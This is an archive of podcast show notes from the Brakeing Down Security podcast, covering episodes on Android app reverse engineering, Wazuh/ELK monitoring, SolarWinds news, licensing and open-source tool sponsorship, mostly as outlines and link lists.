Tools used - Frida, Jadx-GUI (or command line), text editor. All of these items are free.
No setup required if using my virtual machine :-)
These apps are OS specific if you choose Linux or Windows.
Callbacks
Methodology
Decompile the application - can use a tool titled - Apktool (free)
Look “under the hood” of the application - Jadx-GUI (Graphical User Interface) or Jadx-CLI (command line)
Connect your emulator/device using Android Debug Bridge (adb)
Get version of Frida on device
Look online to find correct version of Frida **this is important**
Start to play around with the tool and see if you receive error messages/prompts. Can then go back to code that was reverse engineered and see where it’s located.
Best practices
Leave no stones unturned! Meaning you might see something that seems too rudimentary to work - and yet it does.
Cert pinning -
Typical issues seen
Hard-coded passwords, data that is not being encrypted in rest or transit.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 7, 20212021-008-Jasmine jackson - TheFluffy007, Bio and background, Android App analysis - part 1
@thefluffy007
A Bay Area Native (Berkeley)
I always tell people my computer journey started at 14, but it really started at 5th grade (have a good story to tell about this)
Was a bad student in my ninth grade year - almost kicked out of high school due to cutting. Had a 1.7 GPA. After my summer internship turned it around to a 4.0.
Once I graduated from high school, I knew I wanted to continue on the path of computers. Majored in Computer Science
Graduated with Bachelors and Masters in Computer Science. Graduate Certificate in Information Security and Privacy. Minor in Math.
Interested in security from a Yahoo! Group on Cryptography. Liked how you can turn text into gibberish and back again.
Became interested in penetration testing after moving to Charlotte, and moonlighted as a QA while a full-stack developer.
Co-workers did not want me to test their code because I would always find bugs.
Moved into penetration testing space.
Always had an interest in mobile, but never did mobile development and decided it wasn’t for me
Became interested in bug bounties and noticed that mobile payouts were higher.
At this time also completed SANS 575 - Mobile Device Security and Ethical Hacking.
Realized the barrier to entry was VERY (almost non-existent) low in Android as it’s open source.
Started to learn/expand mobile hacking on my own time
The threat exposure is VERY high with mobile hacking. As you have a web app component, network component, and phone component. I always reference a slide from Secure Works.
Link to YouTube Channel → thefluffy007 - YouTube
thefluffy007 – A security researchers thoughts on all things security – web, mobile, and cloud
The Mobile App Security Company | NowSecure
owasp-mstg/Crackmes at master · OWASP/owasp-mstg · GitHub
Rana Android Malware (reversinglabs.com)
These 21 Android Apps Contain Malware | PCMag
Android Tamer -Android Tamer
The Diary of an (Inexperienced) Bug Hunter - Intro to Android Hacking | Bugcrowd
Android Debug Bridge (adb) | Android Developers
Goal: discussing best practices and methods to reverse engineer Android applications
Introduction to Java (w3schools.com)
JavaScript Introduction (w3schools.com)
Introduction to Python (w3schools.com)
Frida • A world-class dynamic instrumentation framework | Inject JavaScript to explore native apps on Windows, macOS, GNU/Linux, iOS, Android, and QNX (Frida can be used with JavaScript, and Python, along with other languages)
GitHub - dweinstein/awesome-frida: Awesome Frida - A curated list of Frida resources http://www.frida.re/ (https://github.com/frida/frida)
Android APK crackme: owasp-mstg/0x05c-Reverse-Engineering-and-Tampering.md at master · OWASP/owasp-mstg · GitHub
Reverse-Engineering - YobiWiki
IntroAndroidSecurity download | SourceForge.net ←- link to my virtual machine and Androidx86 emulator
Background:
**consider this a primer for any class you might teach, a teaser, if you will**
Why do we want to be able to reverse engineer APKs and IPKs?
Android APKS (Android Packages) holds the source code to the application. If you can reverse this you will essentially have the keys to the kingdom. Developers and companies (if they’re proprietary) will add obfuscation - a technique to make the code unreadable to thwart reverse engineers from finding out their code.
What are some of the structures and files contained in APKs that are useful for ppl analyzing binaries?
Android applications have to have a MainActivity (written in Java). This activity is the entry point to the application.
Android applications also have an AndroidManifest.xml file which is the skeleton of the application. This describes the main activity, intents, service providers, permissions, and what Android operating system can run the application.
When testing apps for security, how easy is it to emulate security and physical controls if you’re not on a handset?
Pretty easy. You can use an emulator. I must forewarn though - you will need A LOT of memory for it to work effectively.
Are there ever any times you HAVE to use a handset? An app that tests something like Android’s Safetynet and won’t run without it? Do they ever want perf testing on their apps?
Was thinking about how you check events in logs, battery drain, using apps on older Android/iOS versions?
When organizations or developers ask you to test an app, is there anything in particular in scope? Out of scope?
How do progressive web apps differ than a more traditional app?
Lab setup
IntroToAndroidSecurity VM
Android Emulator
Tools to use
Why use them? (free, full-featured)
Setup and installation
OS-specific tools?
Tools used - Frida, Jadx-GUI (or command line), text editor. All of these items are free.
No setup required if using my virtual machine :-)
These apps are OS specific if you choose Linux or Windows.
Callbacks
Methodology
Decompile the application - can use a tool titled - Apktool (free)
Look “under the hood” of the application - Jadx-GUI (Graphical User Interface) or Jadx-CLI (command line)
Connect your emulator/device using Android Debug Bridge (adb)
Get version of Frida on device
Look online to find correct version of Frida **this is important**
Start to play around with the tool and see if you receive error messages/prompts. Can then go back to code that was reverse engineered and see where it’s located.
Best practices
Leave no stones unturned! Meaning you might see something that seems too rudimentary to work - and yet it does.
Cert pinning -
Typical issues seen
Hard-coded passwords, data that is not being encrypted in rest or transit.
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: March 2, 20212021-007-News-Google asking for OSS to embrace standards, insider threat at Yandex, Vectr Discussion
Links to discussed items:
Yandex Employee Caught Selling Access to Users' Email Inboxes (thehackernews.com)
Supply-Chain Hack Breaches 35 Companies, Including PayPal, Microsoft, Apple | Threatpost
Google pitches security standards for 'critical' open-source projects | SC Media (scmagazine.com)
https://www.kitploit.com/2021/02/damn-vulnerable-graphql-application.html
https://www.blumira.com/careers/?gh_jid=4000142004 sec evangelist @blumira
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 21, 20212021-006-Ronnie Watson (@secopsgeek), building a security monitoring system with ELK, and Wazuh - part2
Ronnie Watson (@secopsgeek)
Youtube: watson infosec - YouTube
watsoninfosec (Watsoninfosec) · GitHub
Feel free to add anything you like
Wazuh - fork of OSSEC (Migrating from OSSEC · Wazuh · The Open Source Security Platform)
Implementing a Network Security Metrics Programs (giac.org)
What to track.
Some suggested metrics to start with:
- Number of Successful Logons – from security audits.
- Number of Unsuccessful Logons – from security audits.
- Number of Virus Infections during a given period.
- Number of incidents reported.
- Number of security policy violations during a given period.
- Number of policy exceptions during a given period.
- Percentage of expired passwords.
- Number of guessed passwords – use a password cracker to test passwords.
- Number of incidents.
- Cost of monitoring during a given period – use your time tracking system if you have one.
6 Essential Security Features for Network Monitoring Solutions (solutionsreview.com)
Metrics of Security (nist.gov)
Security metrics are essential to comprehensive network security and CSA management. Without good metrics, analysts cannot answer many security related questions. Some examples of such questions include “Is our network more secure today than it was before?” or “Have the changes of network configurations improved our security posture?”
The ultimate aim of security metrics is to ensure business continuity (or mission success) and minimize business damage by preventing or minimizing the potential impact of cyber incidents.
DNS over HTTPs DNS over HTTPS - Wikipedia
Published on: February 14, 20212021-005-Ronnie Watson (@secopsgeek), building a security monitoring system with ELK, and Wazuh
Ronnie Watson (@secopsgeek)
Youtube: watson infosec - YouTube
watsoninfosec (Watsoninfosec) · GitHub
Wazuh - fork of OSSEC (Migrating from OSSEC · Wazuh · The Open Source Security Platform)
Implementing a Network Security Metrics Programs (giac.org)
What to track.
Some suggested metrics to start with:
- Number of Successful Logons – from security audits.
- Number of Unsuccessful Logons – from security audits.
- Number of Virus Infections during a given period.
- Number of incidents reported.
- Number of security policy violations during a given period.
- Number of policy exceptions during a given period.
- Percentage of expired passwords.
- Number of guessed passwords – use a password cracker to test passwords.
- Number of incidents.
- Cost of monitoring during a given period – use your time tracking system if you have one.
6 Essential Security Features for Network Monitoring Solutions (solutionsreview.com)
Metrics of Security (nist.gov)
Security metrics are essential to comprehensive network security and CSA management. Without good metrics, analysts cannot answer many security related questions. Some examples of such questions include “Is our network more secure today than it was before?” or “Have the changes of network configurations improved our security posture?”
The ultimate aim of security metrics is to ensure business continuity (or mission success) and minimize business damage by preventing or minimizing the potential impact of cyber incidents.
DNS over HTTPs DNS over HTTPS - Wikipedia
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 9, 20212021-004-Danny Akacki talks about Mergers and Acquisitions - Part 2
Discussion on Mergers and acquisitions processes
On being acquired, but also if you’re acquiring a company
Best Practices
Best Practices of Mergers and Acquisitions (workforce.com)
The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com)
Security Considerations in the Merger/Acquisition Process (sans.org)
The 10 steps to successful M&A integration | Bain & Company
Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com)
“We’ve been acquired by X!”
First thing people think “oh no, what’s gonna happen to me.”
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: February 3, 2021
2021-003- Danny Akacki, open communications, mergers&acquistions
Discussion on Mergers and acquisitions processes
On being acquired, but also if you’re acquiring a company
Best Practices
Best Practices of Mergers and Acquisitions (workforce.com)
The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com)
Security Considerations in the Merger/Acquisition Process (sans.org)
Women Unite Over CTF 3.0 (ittakesahuman.com)
The 10 steps to successful M&A integration | Bain & Company
Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com)
“We’ve been acquired by X!”
First thing people think “what’s gonna happen to me.”
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: January 26, 20212021-002-Elastic Search license changes, Secure RPC patching for windows, ironkey traps man's $270 million in Bitcoin
Secure RPC issue -
Elastic Search
https://anonymoushash.vmbrasseur.com/2021/01/14/elasticsearch-and-kibana-are-now-business-risks
“There are those who will point to the FAQ for the SSPL and claim that the license isn’t interpreted in that way because the FAQ says so. Unfortunately, when you agree to a license you are agreeing to the text of that license document and not to a FAQ. If the text of that license document is ambiguous, then so are your rights and responsibilities under that license. Should your compliance to that license come before a judge, it’s their interpretation of those rights and responsibilities that will hold sway. This ambiguity puts your organisation at risk.”
Doubling down on open, Part II | Elastic Blog - license change affecting Elastic Search and Kibana
MongoDB did something similar in 2018: mjg59 | Initial thoughts on MongoDB's new Server Side Public License (dreamwidth.org)
Hacker News Discussion: MongoDB switches up its open source license | Hacker News (ycombinator.com)
[License-review] Approval: Server Side Public License, Version 2 (SSPL v2) (opensource.org)
“We continue to believe that the SSPL complies with the Open Source
Definition and the four essential software freedoms. However, based on its
reception by the members of this list and the greater open source
community, the community consensus required to support OSI approval does
not currently appear to exist regarding the copyleft provision of SSPL.
Thus, in order to be respectful of the time and efforts of the OSI board
and this list’s members, we are hereby withdrawing the SSPL from OSI
consideration.”
(could be ‘open-source’, but negative feedback on mailing lists and elsewhere made the remove it from consideration from OSI)
Open Source license requirements: The Open Source Definition | Open Source Initiative
What does this mean?
If you have products that utilize ElasticSearch/MongoDB/Kibana in some way, talk to your legal teams to find out if you need to divest your org from them. These are not ‘opensource’ licenses… they are ‘source available’
It might not affect your organization and moving to SSPL might be feasible. If your product makes any changes internally to ElasticSearch,
Notable links
JTNYDV - specifically the CIS docker hardening
Twitter: @jtnydv
https://www.coindesk.com/anchorage-becomes-first-occ-approved-national-crypto-bank
https://www.cnn.com/2021/01/15/uk/bitcoin-trash-landfill-gbr-scli-intl/index.html
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: January 19, 20212021-001-news, youtuber 'dream' doxxed, solarwind passwords bruteforced, malware attacks
Dream Doxxed:
Minecraft YouTuber Dream Doxxed Following Speedrun Controversy (screenrant.com)
Osint issues… found him by breadcrumbs and using zillow internal pics of his house. Craziness
How to Use APIs (explained from scratch) (secjuice.com)
Hackers target cryptocurrency users with new ElectroRAT malware | ZDNet
Cobalt Strike and Metasploit accounted for a quarter of all malware C&C servers in 2020 | ZDNet
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: January 12, 20212020-046-solarwinds-fireeye-breaches-GE-medical-device-issues-and-2021_predictions
End of year podcast
Blumeria sponsorship
NEWS:
IT company SolarWinds says it may have been hit in 'highly sophisticated' hack | Reuters
FireEye hacked: US cybersecurity firm FireEye hit by 'state-sponsored' attack - BBC News
https://krypt3ia.wordpress.com/ - 16 december 2020
Microsoft flexing muscle to shutdown c2: Microsoft unleashes ‘Death Star’ on SolarWinds hackers in extraordinary response to breach - GeekWire
Little-known SolarWinds gets scrutiny over hack, stock sales (apnews.com)
FireEye, GoDaddy,and Microsoft create kill switch for SolarWinds backdoorSecurity Affairs
US Gov has hacked: US government agencies hacked; Russia a possible culprit (apnews.com)
Not mentioned during the podcast: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor | FireEye Inc
Not trying to spread FUD, but would infiltration by using FOSS tools be easier than Solarwinds?
Time to remove Nano Adblocker and Defender from your browsers (except Firefox) - gHacks Tech News
System oriented programming - Cloud-Sliver (cloud-sliver.com)
G’bye Flash… Adobe releases final Flash Player update, warns of 2021 kill switch (bleepingcomputer.com)
IT workers worried about AI making them obsolete… IT Workers Fear Becoming Obsolete in Cyber Roles - Infosecurity Magazine (infosecurity-magazine.com)
Qbot malware switched to stealthy new Windows autostart method (bleepingcomputer.com)
https://www.atlasobscura.com/places/encryption-lava-lamps - “The randomness of this wall of lava lamps helps encrypt up to 10 percent of the internet. “
It’s been the year of the business continuity program this year… and how agile yours is.
--thoughts?
Future?
Bryan: Companies that are ‘all in’ on remote work will back track.
Amanda: I think we’ll see way more keep the wfh now that they realize it saves $$
heck out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: December 17, 2020SPONSORED- Nathanael Iversen from Illumio, future of microsegmentation,
BrakeSec Sponsored Interview with Nathanael Iversen
Questions, comments, and other content goes here:
Illumio Nathanael Iversen BDS Podcast Messaging
Topic: Overview of development and deployment of micro-segmentation
Where does segmentation fit into your security strategy?
- Micro-segmentation is a preventive measure deployed to create and enforce access at the workload layer. It does not replace identity and access management (IAM), perimeter firewalls, or patching but complements such solutions.
- Because traditional network segmentation is done with network devices, it only works when the traffic passes through that control point. Micro-segmentation, on the other hand, shifts the enforcement point from the network onto the individual servers and hosts. The means that segmentation policy can be much more granular and can encompass all inbound and outbound traffic, not just the traffic leaving a network zone, VLAN, or environment.
- Micro-segmentation is a great deterrent for hackers. More organizations are implementing micro-segmentation as an essential part of a defense-in-depth strategy. According to a recent survey of over 300 IT professionals, 45% currently have a segmentation project or are planning one.
The keys to a successful micro-segmentation deployment: As with any security control, it’s important to balance the strategy of the business with the need to secure it. There are several key functions and abilities to consider to ensure your deployment goes smoothly:
- Visibility with application context
- Scalable architecture
- Abstracted security policies
- Granular controls
- Consistent policy framework across your compute estate
- Integration with security ecosystem
There are three broad preventive security actions:
- First is controlling the ability to reach the device or target service via the network. Clearly, if you cannot even get to the sensitive data or application, then no amount of vulnerabilities will permit compromise. Often terms like firewall, access control lists (ACLs), VLANs, zones, and the like describe these capabilities. This function is generally implemented by the network team or a dedicated network security team.
- The second broad action available controls the ability to access a device, data or service once you get there. This covers the entire world of credentials, user accounts, permissions, authentication, authorization, tokens, API keys, etc. If you get to the front door of my house and it is locked, you can’t gain access unless you have the right key.
- The third broad strategy addresses the fact that often malicious behavior exploits some bug or weakness. So, if one can remove vulnerable code, then in many cases, malicious intent can’t be realized. This involves patching, replatforming applications to stronger platforms, doing code reviews, and more.
Potential questions:
- What is micro-segmentation? How long has it been around?
- Can micro-segmentation be used in conjunction with other cybersecurity tools? Like firewalls?
- How does micro-segmentation operate in different environments? How does development and deployment differ in the cloud vs. on-prem?
- What does a successful micro-segmentation deployment look like?
- Tell us about the common challenges people face in their micro-segmentation projects.
- What misconceptions do people have about micro-segmentation?
- What is the difference between having a proactive vs. reactive security strategy?
-
- Can you explore the ‘cost’ of preventative cybersecurity in 2020? I.e., how much can your organization save by preventing breaches, vs. paying off ransomware attackers? Or losing customer trust via a public breach?
- What does micro-segmentation adoption look like as we head into the new year?
- What is the future of micro-segmentation? Segmentation of database areas? Logs?
2020-045-Marco Salvati, supporting open source devs, incentivizing leeching companies who don't give back- part2
https://www.hak4kidz.com/activities/cdcedu.html
Online CTF training using Cisco’s Workshop platform. They did something similar in Spring of 2020.
There will be an online panel where kids can ask questions about information security.
Occurs on December 12th. Check out the link for more info.
Robert M. for upping his patreon to $5
Top 25 Data Security Podcasts You Must Follow in 2020 (feedspot.com)
@byt3bl33d3r (Marcello Salvati)
@porchetta_ind (porchetta Industries)
Wanna sponsor CrackMapExec? Sponsor @byt3bl33d3r on GitHub Sponsors
Github sponsors: GitHub Sponsors
How is this different than shareware?
“As a developer of one of these tools, you obviously start questioning your life decisions after a while. Especially after putting so much time into these projects.”
Adblockers installed 300,000 times are malicious and should be removed now | Ars Technica
(spent years supporting the app… the vitriol from ‘unpaid customers’ is deafening… Should be required reading for anyone wanting to open source anything.) [Announcement] Recent and upcoming changes to the Nano projects · Issue #362 · NanoAdblocker/NanoCore (github.com)
Business model for typical opensource projects. Where’s the chain broken at?
Devs who expect help/support for their project?
“Many eyes make for less vulns” (LOL, sounds good, not true anymore --brbr)
What is the ‘status quo’ of OSS infosec/hacking tool developer community (in your opinion)?
Pull requests, what is ‘meaningful’ contributions?
What is the definition of ‘widely-used’? Why support widely-used OSS hacking tools?
And now for something completely different... (porchetta.industries)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
#cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP #porchetta #training #sponsorship #github #opensource #crackmapexec #byt3bl33d3r #marcelloSalvati
Published on: December 7, 20202020-044-Marcello Salvati (@byt3bl33d3r), porchetta industries, supporting opensource tool creators, sponsorship model
https://www.hak4kidz.com/activities/cdcedu.html
Online CTF training using Cisco’s Workshop platform. They did something similar in Spring of 2020.
There will be an online panel where kids can ask questions about information security.
Occurs on December 12th. Check out the link for more info.
Robert M. for upping his patreon to $5
Top 25 Data Security Podcasts You Must Follow in 2020 (feedspot.com)
@byt3bl33d3r (Marcello Salvati)
@porchetta_ind (porchetta Industries)
Wanna sponsor CrackMapExec? Sponsor @byt3bl33d3r on GitHub Sponsors
Github sponsors: GitHub Sponsors
How is this different than shareware?
“As a developer of one of these tools, you obviously start questioning your life decisions after a while. Especially after putting so much time into these projects.”
Adblockers installed 300,000 times are malicious and should be removed now | Ars Technica
(spent years supporting the app… the vitriol from ‘unpaid customers’ is deafening… Should be required reading for anyone wanting to open source anything.) [Announcement] Recent and upcoming changes to the Nano projects · Issue #362 · NanoAdblocker/NanoCore (github.com)
Business model for typical opensource projects. Where’s the chain broken at?
Devs who expect help/support for their project?
“Many eyes make for less vulns” (LOL, sounds good, not true anymore --brbr)
What is the ‘status quo’ of OSS infosec/hacking tool developer community (in your opinion)?
Pull requests, what is ‘meaningful’ contributions?
What is the definition of ‘widely-used’? Why support widely-used OSS hacking tools?
And now for something completely different... (porchetta.industries)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Brakesec Store!: https://brakesec.com/teepub
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
#cybersecurity #informationsecurity #leadership #podcasts #CPEs #CISSP #porchetta #training #sponsorship #github #opensource #crackmapexec #byt3bl33d3r #marcelloSalvati
Published on: December 2, 20202020-043-Software_Defined_Radio-Sebastien_dudek-RF-attacks- IoT and car RF attacks
Sébastien Dudek -
@penthertz
Why we are here today?
Software Defined Radio (sdr-radio.com)
What kind of hardware or software do you need? Why would a security professional want to know how to use SDR tools and attacks?
